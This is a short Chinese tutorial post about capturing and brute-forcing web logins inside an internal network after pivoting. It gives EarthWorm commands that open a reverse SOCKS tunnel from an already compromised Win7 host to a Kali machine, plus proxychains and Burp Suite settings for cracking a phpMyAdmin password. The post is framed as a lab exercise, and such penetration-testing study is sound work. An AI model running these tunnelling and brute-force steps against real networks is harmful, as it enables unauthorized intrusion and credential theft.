首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >内网穿透后抓包技巧

内网穿透后抓包技巧

作者头像
字节脉搏实验室
发布2020-12-08 14:53:46
发布2020-12-08 14:53:46
1.5K0
举报

提出问题:通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢?如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢?

一、实验环境

二、实验工具

Earthworm:下载地址:http://rootkiter.com/EarthWorm/

三、操作步骤

首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。

知识点:

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端。

反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端。

一般当有防火墙过滤时,正向连接无法建立时,尝使用反向代理的方式将目标机器的流量代理出来,所以这里就用到了代理中的大杀器EW。

EW关于代理的部分知识也很简单,这里不对其所有的代理方法进行介绍,只对反向代理中用到的部分进行阐述。

Kali:./ew_for_linux64 -s rcsocks -l 1080 -e 8880

该命令是将本地1080端口的流量走向本地8880端口

Win7靶机:ew.exe -s rssocks -d 172.17.60.226 -e 8880

该命令是将Win7靶机的流量流向Kali(172.17.60.226)的8880端口,但是流量之间的信息是需要通过端口进行交互的,Win7上虽然没有开放端口,但也会有一个大端口与Kali的8880端口进行双向交互。

EW连接上后再修改Proxychains的配置文件

(vi /etc/proxychains.conf)将dynamic_chain前的注释去掉,并在最后写上socks5 127.0.0.1 1080

这样所有使用proxychains代理链开启的工具流量都会从本地的1080走向Win7的某大端口,从而将流量成功带入到内网环境,再通过proxychains firefox开启火狐访问内网win7的web端口发现存在phpmyadmin。

实验以phpmyadmin的密码爆破抓包为例,实战以任意web页面都可。首先不使用proxychains开启火狐,正常开启,正常配置bp端口进行抓包即可。

然后修改BurpSuite的User option选项将SOCKS Proxy中的代理修改为127.0.0.1 1080(与Proxychains中的配置相同)再进行抓包就可以对内网的web页面密码进行爆破了

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-11-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档